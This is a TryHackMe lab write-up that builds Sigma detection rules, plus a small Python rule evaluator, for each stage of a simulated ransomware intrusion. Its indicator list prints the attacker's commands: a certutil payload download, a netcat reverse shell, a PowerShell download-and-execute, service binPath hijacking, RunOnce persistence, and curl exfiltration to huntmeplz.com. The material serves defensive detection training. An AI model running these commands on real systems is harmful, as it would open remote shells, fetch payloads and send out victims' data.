TryHackMe SigHunter WriteUp

Initial Information

  1. First week of work: a ransomware incident has just concluded
    1. Threat mitigated successfully by the Incident Responders

Attack Chain

  1. Execution of malicious HTML Application (HTA) payload from a phishing link.
  2. Execution of Certutil tool to download Netcat binary.
  3. Netcat execution to establish a reverse shell.
  4. Enumeration of privilege escalation vectors through PowerUp.ps1
  5. Abused service modification privileges to achieve System privileges.
  6. Collected sensitive data by archiving via 7-zip.
  7. Exfiltrated sensitive data through cURL binary.
  8. Executed ransomware with huntme as the file extension.
Attack Technique: Indicators of Compromise

HTA payload
  Parent Image: chrome.exe
  Image: mshta.exe
  Command Line: C:\Windows\SysWOW64\mshta.exe C:\Users\victim\Downloads\update.hta

Certutil Download
  Image: certutil.exe
  Command Line: certutil -urlcache -split -f http://huntmeplz.com/ransom.exe ransom.exe

Netcat Reverse Shell
  Image: nc.exe
  Command Line: C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe
  MD5 Hash: 523613A7B9DFA398CBD5EBD2DD0F4F38

PowerUp Enumeration
  Image: powershell.exe
  Command Line: powershell "iex(new-object net.webclient).downloadstring('http://huntmeplz.com/PowerUp.ps1'); Invoke-AllChecks;"

Service Binary Modification
  Image: sc.exe
  Command Line: sc.exe config SNMPTRAP binPath= "C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe"

RunOnce Persistence
  Image: reg.exe
  Command Line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v MicrosoftUpdate /t REG_SZ /d "C:\Windows\System32\cmdd.exe"

7-zip Collection
  Image: 7z.exe
  Command Line: 7z a exfil.zip * -p

cURL Exfiltration
  Image: curl.exe
  Command Line: curl -d @exfil.zip http://huntmeplz.com:8080/

Ransomware File Encryption
  Image: ransom.exe
  Target Filename: *.huntme
Attack Technique: Required Detection Fields

HTA payload: EventID, ParentImage, Image
Certutil Download: EventID, Image, CommandLine
Netcat Reverse Shell: EventID, Image, CommandLine, Hashes
PowerUp Enumeration: EventID, Image, CommandLine
Service Binary Modification: EventID, Image, CommandLine
RunOnce Persistence: EventID, Image, CommandLine
7-zip Collection: EventID, Image, CommandLine
cURL Exfiltration: EventID, Image, CommandLine
Ransomware File Encryption: EventID, TargetFilename

For the following challenges we will only display the code that is relevant to our changes.

Challenge #1

We have been informed that the Image is mshta.exe,
the ParentImage is chrome.exe,
and that we also need to pull the EventID field.

To do this we can use the contains modifier as our go-to, like so:

detection:
  selection:
    Image|contains: 'mshta.exe' #Checks the Image field for the program mshta.exe
    ParentImage|contains: 'chrome.exe' #Checks the ParentImage field for chrome.exe
  condition: selection
fields: #Will pull the EventID field along with each match of the rule (Sigma expects a list here)
  - EventID

Challenge #2

Up next we will again focus on detection and fields. In this case we know the following:

  • Image: certutil.exe
  • Command Line requirements:
    • certutil
    • -urlcache: forces certutil to ignore the existing cache and grab a new copy of the file
    • -split: splits embedded ASN.1 elements and saves them to files, allowing the capture of embedded malicious payloads
    • -f: specifies the URL and the file name to download

To write our required sigma rules we will do the following:

detection:
  selection:
    Image|contains: 'certutil.exe'
    CommandLine|contains|all: #Every listed string must appear in the command line
      - 'certutil'
      - '-urlcache'
      - '-split'
      - '-f'
  condition: selection
fields:
  - EventID

Challenge #3

Repetitive, I know, but this is what we're looking for: the Netcat reverse shell.
We know the following:

  • Image: nc.exe
  • CommandLine: C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe
  • Hashes: MD5 Hash: 523613A7B9DFA398CBD5EBD2DD0F4F38

We need to remember that we are checking for the -e flag on nc.exe; however, because the binary may have entered the system by a different route, we want to check for its hash as a separate selection.

See the code below:

detection:
  selectionNC: #Checks for netcat running with the -e execute flag
    EventID: 1 #Checks for event type 1 (Sysmon process creation)
    Image|contains: '\nc.exe' #Checks that the process being run is nc.exe; refer to the required fields provided in the task
    CommandLine|contains: ' -e ' #Checks whether netcat executes a program after connecting; on a true positive this hands a command prompt to the attacker

  selectionHASH: #Searches for this hash, as any file carrying it is the binary found in the original incident
    Hashes|contains: '523613A7B9DFA398CBD5EBD2DD0F4F38'
  condition: selectionNC or selectionHASH #Ensures the rule triggers on either the hash or the nc.exe -e event
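The selection and condition semantics used in Challenges #1 to #3 (contains, endswith, contains|all, and an or between selections) can be checked offline with this small evaluator. It is an added example, not the writeup's or the Sigma project's code; the events it runs over are constructed samples, and the field names follow the Sysmon fields used in the task.

```python
def field_matches(field_spec, value, event):
    """Evaluate one 'Field|modifier: value' entry against an event dict."""
    name, *mods = field_spec.split("|")
    actual = str(event.get(name, ""))
    values = value if isinstance(value, list) else [value]
    if "contains" in mods:
        hits = [str(v) in actual for v in values]
    elif "endswith" in mods:
        hits = [actual.endswith(str(v)) for v in values]
    else:  # no modifier: exact match, e.g. EventID: 1
        hits = [actual == str(v) for v in values]
    return all(hits) if "all" in mods else any(hits)  # |all vs. default any-of

def selection_matches(selection, event):
    # Every field inside one selection must match (implicit AND).
    return all(field_matches(k, v, event) for k, v in selection.items())

def rule_matches(detection, event):
    """Evaluate a detection block whose condition is 'X', 'X or Y' or 'X and Y'."""
    cond = detection["condition"]
    if " or " in cond:
        return any(selection_matches(detection[n], event) for n in cond.split(" or "))
    if " and " in cond:
        return all(selection_matches(detection[n], event) for n in cond.split(" and "))
    return selection_matches(detection[cond], event)

# Challenge #3 detection block, transcribed from the writeup above.
NETCAT_RULE = {
    "selectionNC": {"EventID": 1, "Image|contains": "\\nc.exe", "CommandLine|contains": " -e "},
    "selectionHASH": {"Hashes|contains": "523613A7B9DFA398CBD5EBD2DD0F4F38"},
    "condition": "selectionNC or selectionHASH",
}

# Constructed Sysmon-style events (sample data, not taken from a real host).
EVENTS = [
    {"EventID": 1, "Image": "C:\\Users\\victim\\AppData\\Local\\Temp\\nc.exe",
     "CommandLine": "nc.exe huntmeplz.com 4444 -e cmd.exe", "Hashes": "MD5=AAAA"},
    {"EventID": 1, "Image": "C:\\Temp\\listener.exe",
     "CommandLine": "listener.exe", "Hashes": "MD5=523613A7B9DFA398CBD5EBD2DD0F4F38"},
    {"EventID": 1, "Image": "C:\\Tools\\nc.exe",
     "CommandLine": "nc.exe -zv host 80", "Hashes": "MD5=BBBB"},
]

def matching_event_indexes(rule=NETCAT_RULE, events=EVENTS):
    """Return the positions of events the rule fires on; [0, 1] for the samples above."""
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]
```

The third sample (nc.exe launched without -e) shows why the ' -e ' check matters: without it every nc.exe launch would fire.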

Challenge #4

PowerUp Enumeration: the attacker runs PowerUp.ps1, a PowerShell privilege escalation enumeration script.

We are provided the following knowledge for this:
EventID: 1
Image: powershell.exe
Command Line: powershell "iex(new-object net.webclient).downloadstring('http://huntmeplz.com/PowerUp.ps1'); Invoke-AllChecks;"

detection:
  selection:
    EventID: 1 #Ensure that the event type is 1 (process creation)
    Image|endswith: powershell.exe #Search for powershell being run
    CommandLine|contains|all:
      - 'iex' #Checks for Invoke-Expression, which runs commands and expressions on the local computer
      - 'downloadstring' #Downloads a file or script as a string, which the preceding iex then runs
      - 'Invoke-AllChecks' #Runs every PowerUp check
      - 'PowerUp' #A script used to enumerate different privilege escalation vectors
  condition: selection #Use the previously created selection

Challenge #5

Service Binary Modification: a service with excessive privileges can be reconfigured to give the attacker System privileges.

What we know:
EventID: 1
Image: sc.exe
Command Line: sc.exe config SNMPTRAP binPath= "C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe"

detection:
  selection:
    EventID: 1 #Ensure that the event type is 1 (process creation)
    Image|endswith: 'sc.exe' #The Service Control application is being run
    CommandLine|contains|all:
      - 'sc.exe' #The application being called is Service Control
      - ' -e ' #The execute flag passed to the reverse shell binary inside the new binPath
      - ' config ' #Modifies the value of a service's entries
      - ' binPath= ' #Points the service's binary path at the malicious executable
  condition: selection #Use the selection above

Challenge #6

RunOnce Persistence: this allows an attacker to set up persistence on the system and/or the network.

What we know:
EventID: 1
Image: reg.exe
Command Line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v MicrosoftUpdate /t REG_SZ /d "C:\Windows\System32\cmdd.exe"

detection:
  selection:
    EventID: 1 #Ensure that the event type is 1 (process creation)
    Image|endswith: 'reg.exe' #The registry command-line tool is being run
    CommandLine|contains|all:
      - " add " #This command adds a new registry key/value to the registry
      - "RunOnce" #Looks for the RunOnce key, which runs a program the next time a user logs on
  condition: selection #Chooses the selection listed above as the detection rule to look for

Challenge #7

7-Zip collection is the start of the exfiltration process, where the attacker gathers the data into an archive.
What we have:

  • EventID: 1
  • Image: 7z.exe
  • Command Line: 7z a exfil.zip * -p

detection:
  selection:
    EventID: 1 #Ensure that Event Type is 1. 
    Image|endswith: 7z.exe #We're looking for the 7zip process that will be used to archive and compress the data
    CommandLine|contains|all:
      - ' a ' # This flag will archive the data that is entered further in the command
      - ' * ' #This states to select all files
      - '.zip' #We can see that this is a compressed zip archive at this point
      - ' -p' #Sets a password, in this case most likely blank, on the archive
  condition: selection 

Challenge #8

cURL Exfiltration: this is the exfiltration step that takes place after the data has been archived. We will need to look for the file being pushed up to a website.

What we have for information:
EventID: 1
Image: curl.exe
CommandLine: curl -d @exfil.zip http://huntmeplz.com:8080/

detection:
  selection:
    EventID: 1 #Ensure that the event type is 1 (process creation)
    Image|endswith: curl.exe #Checks for the cURL command-line application
    CommandLine|contains|all:
      - 'curl ' #Reviews the command line for the curl command
      - ' -d ' #Checks for the -d flag, which sends data as a POST body and can be used to move exfiltrated data to a specific website
      - ' @' #Following the -d flag, this specifies the file whose contents are sent to the website
      - '.zip ' #If all the other parts are seen, this checks that the file being sent is an archive
  condition: selection #Use the selection above; conditions can also combine selections with and, or and not

Challenge #9

The ransomware file encryption step encrypts files on the system and renames them with the extension .huntme.

What we know:
EventID: 11
TargetFilename: *.huntme

detection:
  selection:
    EventID: 11 #Checks that the event type is 11 (file creation)
    TargetFilename|endswith: '.huntme' #Looks for files that have been renamed by the program to end with the extension .huntme
  condition: selection